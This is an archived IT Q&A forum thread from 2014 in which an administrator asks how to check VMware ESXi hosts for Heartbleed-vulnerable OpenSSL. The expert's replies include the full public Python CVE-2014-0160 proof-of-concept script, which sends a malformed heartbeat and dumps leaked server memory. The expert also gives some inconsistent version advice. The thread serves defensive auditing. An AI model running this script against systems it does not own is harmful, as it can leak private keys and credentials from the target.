Solved

A Script to Determine OpenSSL version on ESXi Host

Posted on 2014-04-09
12
1,661 Views
Last Modified: 2014-04-16
I need to write a script that basically run thru each ESX host and determine what version of OpenSSL is running and report back which, if any, are vulnerable.

OpenSSL 1.0.1 through 1.0.1f (inclusive) are vulnerable

Those any such script that is similar already exist?

Thanks.

lipotech
0
Comment
Question by:lipotech
  • 7
  • 5
12 Comments
 
LVL 119
ID: 39990321
see this thread, will answer your question, you just need to check VMware ESXi BUILDs

a test script is included...

https://communities.vmware.com/thread/475569

prior to ESXi 5.5 should be unaffected.

VMware response...

http://kb.vmware.com/selfservice/microsites/search.do?language=en_US&cmd=displayKC&externalId=2076225
0
 

Author Comment

by:lipotech
ID: 39998893
Hancock,

Sorry for the delayed response.  I have been involved in other support activities over the weekend.  I followed the thread as you recommended.  I reviewed the script and I have a series of questions:

1.  Is this a PowerCli?
2.  If so, how would I launch this script?  I have multiple vCenters Servers to choose from.
3. Would the script be saved as a text file and launched from within PowerShell from the command line?

That you for your support.

lipotech
0
 
LVL 119
ID: 39998914
1.  Is this a PowerCli?

No.

It's not PowerCLI.

Are all your hosts 5.5, if they are 5.5, they have the issue.

If they are lower than 5.1, they do not have this issue.

It's that simple, the details in the forum, are a simple openssl.exe connection call.

2.  If so, how would I launch this script?  I have multiple vCenters Servers to choose from.

It's run from the command prompt, in the Openssl folder, against the IP Address, of a suspect system (vCenter Server or Host)

3. Would the script be saved as a text file and launched from within PowerShell from the command line?

It's not a script, it's just a command line function.

Personally, I would not waste your time, check your Host versions > 5.1 you have the threat, and you will need to wait for the VMware patch.

< 5.1 no threat exists!
0
Windows Server 2016: All you need to know

Learn about Hyper-V features that increase functionality and usability of Microsoft Windows Server 2016. Also, throughout this eBook, you’ll find some basic PowerShell examples that will help you leverage the scripts in your environments!

 
LVL 119
ID: 39999136
if you really want a script, here is a python script
#!/usr/bin/python

# Quick and dirty demonstration of CVE-2014-0160 by Jared Stafford (jspenguin@jspenguin.org)
# The author disclaims copyright to this source code.

import sys
import struct
import socket
import time
import select
import re
from optparse import OptionParser

options = OptionParser(usage='%prog server [options]', description='Test for SSL heartbeat vulnerability (CVE-2014-0160)')
options.add_option('-p', '--port', type='int', default=443, help='TCP port to test (default: 443)')

def h2bin(x):
    return x.replace(' ', '').replace('\n', '').decode('hex')

hello = h2bin('''
16 03 02 00 dc 01 00 00 d8 03 02 53
43 5b 90 9d 9b 72 0b bc 0c bc 2b 92 a8 48 97 cf
bd 39 04 cc 16 0a 85 03 90 9f 77 04 33 d4 de 00
00 66 c0 14 c0 0a c0 22 c0 21 00 39 00 38 00 88
00 87 c0 0f c0 05 00 35 00 84 c0 12 c0 08 c0 1c
c0 1b 00 16 00 13 c0 0d c0 03 00 0a c0 13 c0 09
c0 1f c0 1e 00 33 00 32 00 9a 00 99 00 45 00 44
c0 0e c0 04 00 2f 00 96 00 41 c0 11 c0 07 c0 0c
c0 02 00 05 00 04 00 15 00 12 00 09 00 14 00 11
00 08 00 06 00 03 00 ff 01 00 00 49 00 0b 00 04
03 00 01 02 00 0a 00 34 00 32 00 0e 00 0d 00 19
00 0b 00 0c 00 18 00 09 00 0a 00 16 00 17 00 08
00 06 00 07 00 14 00 15 00 04 00 05 00 12 00 13
00 01 00 02 00 03 00 0f 00 10 00 11 00 23 00 00
00 0f 00 01 01
''')

hb = h2bin('''
18 03 02 00 03
01 40 00
''')

def hexdump(s):
    for b in xrange(0, len(s), 16):
        lin = [c for c in s[b : b + 16]]
        hxdat = ' '.join('%02X' % ord(c) for c in lin)
        pdat = ''.join((c if 32 <= ord(c) <= 126 else '.' )for c in lin)
        print ' %04x: %-48s %s' % (b, hxdat, pdat)
    print

def recvall(s, length, timeout=5):
    endtime = time.time() + timeout
    rdata = ''
    remain = length
    while remain > 0:
        rtime = endtime - time.time()
        if rtime < 0:
            return None
        r, w, e = select.select([s], [], [], 5)
        if s in r:
            data = s.recv(remain)
            # EOF?
            if not data:
                return None
            rdata += data
            remain -= len(data)
    return rdata
        

def recvmsg(s):
    hdr = recvall(s, 5)
    if hdr is None:
        print 'Unexpected EOF receiving record header - server closed connection'
        return None, None, None
    typ, ver, ln = struct.unpack('>BHH', hdr)
    pay = recvall(s, ln, 10)
    if pay is None:
        print 'Unexpected EOF receiving record payload - server closed connection'
        return None, None, None
    print ' ... received message: type = %d, ver = %04x, length = %d' % (typ, ver, len(pay))
    return typ, ver, pay

def hit_hb(s):
    s.send(hb)
    while True:
        typ, ver, pay = recvmsg(s)
        if typ is None:
            print 'No heartbeat response received, server likely not vulnerable'
            return False

        if typ == 24:
            print 'Received heartbeat response:'
            hexdump(pay)
            if len(pay) > 3:
                print 'WARNING: server returned more data than it should - server is vulnerable!'
            else:
                print 'Server processed malformed heartbeat, but did not return any extra data.'
            return True

        if typ == 21:
            print 'Received alert:'
            hexdump(pay)
            print 'Server returned error, likely not vulnerable'
            return False

def main():
    opts, args = options.parse_args()
    if len(args) < 1:
        options.print_help()
        return

    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    print 'Connecting...'
    sys.stdout.flush()
    s.connect((args[0], opts.port))
    print 'Sending Client Hello...'
    sys.stdout.flush()
    s.send(hello)
    print 'Waiting for Server Hello...'
    sys.stdout.flush()
    while True:
        typ, ver, pay = recvmsg(s)
        if typ == None:
            print 'Server closed connection without sending Server Hello.'
            return
        # Look for server hello done message.
        if typ == 22 and ord(pay[0]) == 0x0E:
            break

    print 'Sending heartbeat request...'
    sys.stdout.flush()
    s.send(hb)
    hit_hb(s)

if __name__ == '__main__':
    main()

  

Open in new window

0
 

Author Comment

by:lipotech
ID: 39999225
Hancock,

Thank you.  I or two more final questions.  Is the Pytjon script luanched fromt the ESX host OpenSSl folders as well?  Can I launch the script as is by saving it to a text file?  What extention would I use on the file?  Do I point this file at the IP address as well?

lipotech
0
 
LVL 119
ID: 39999339
You will need to use the Python script on any computer which has Python installed, this is NOT ESXi!

OpenSSL is not required, just Python.

Save the above to a file called <filename.py> execute permissions, and run from Linux or Windows.

you type

./heartbleed.py <IP Address?

it will return:-

WARNING: server returned more data than it should - server is vulnerable!
0
 

Author Comment

by:lipotech
ID: 40003896
Hancock,

I can install Python and use this script.  I would prefer to run a PowerCLI script in this environment.  If there is PowerCLI script that exist, please let me know.  

Otherwise, thank you for providing a complete response to my question.

lipotech
0
 
LVL 119

Accepted Solution

by:
Andrew Hancock (VMware vExpert / EE MVE^2) earned 500 total points
ID: 40003942
I've not seen a PowerCLI script at present.

Wait until 19th April 2014, there will be a patch and update released!

You could use PowerCLI to run the following command...

~ # openssl version
OpenSSL 1.0.1e 11 Feb 2013
~ # vmware --version
VMware ESXi 5.5.0 build-1623387

if version = 1.1.0e you have the bug, it's not a test, but only ESXi 5.5 has the issue!
0
 

Author Comment

by:lipotech
ID: 40004141
Thank you.
0
 
LVL 119
ID: 40004160
no problems
0
 

Author Comment

by:lipotech
ID: 40004193
If you know of any PowerCli scripts of any type that would be easy follow and test, it would be appreciated.  I am in the process of trying to become more proficient with the PowerCLI scripting language.
0
 
LVL 119
ID: 40004281
See my response to your recent posting.
0

Featured Post

PRTG Network Monitor: Intuitive Network Monitoring

Network Monitoring is essential to ensure that computer systems and network devices are running. Use PRTG to monitor LANs, servers, websites, applications and devices, bandwidth, virtual environments, remote systems, IoT, and many more. PRTG is easy to set up & use.

Question has a verified solution.

If you are experiencing a similar issue, please ask a related question

HOW TO: Install and Configure VMware vSphere Hypervisor 6.5 (ESXi 6.5), Step by Step Tutorial with screenshots. From Download, Checking Media, to Completed Installation.
In this article, I am going to show you how to simulate a multi-site Lab environment on a single Hyper-V host. I use this method successfully in my own lab to simulate three fully routed global AD Sites on a Windows 10 Hyper-V host.
This Micro Tutorial steps you through the configuration steps to configure your ESXi host Management Network settings and test the management network, ensure the host is recognized by the DNS Server, configure a new password, and the troubleshooting…
In this video tutorial I show you the main steps to install and configure  a VMware ESXi6.0 server. The video has my comments as text on the screen and you can pause anytime when needed. Hope this will be helpful. Verify that your hardware and BIO…

776 members asked questions and received personalized solutions in the past 7 days.

Join the community of 500,000 technology professionals and ask your questions.

Join & Ask a Question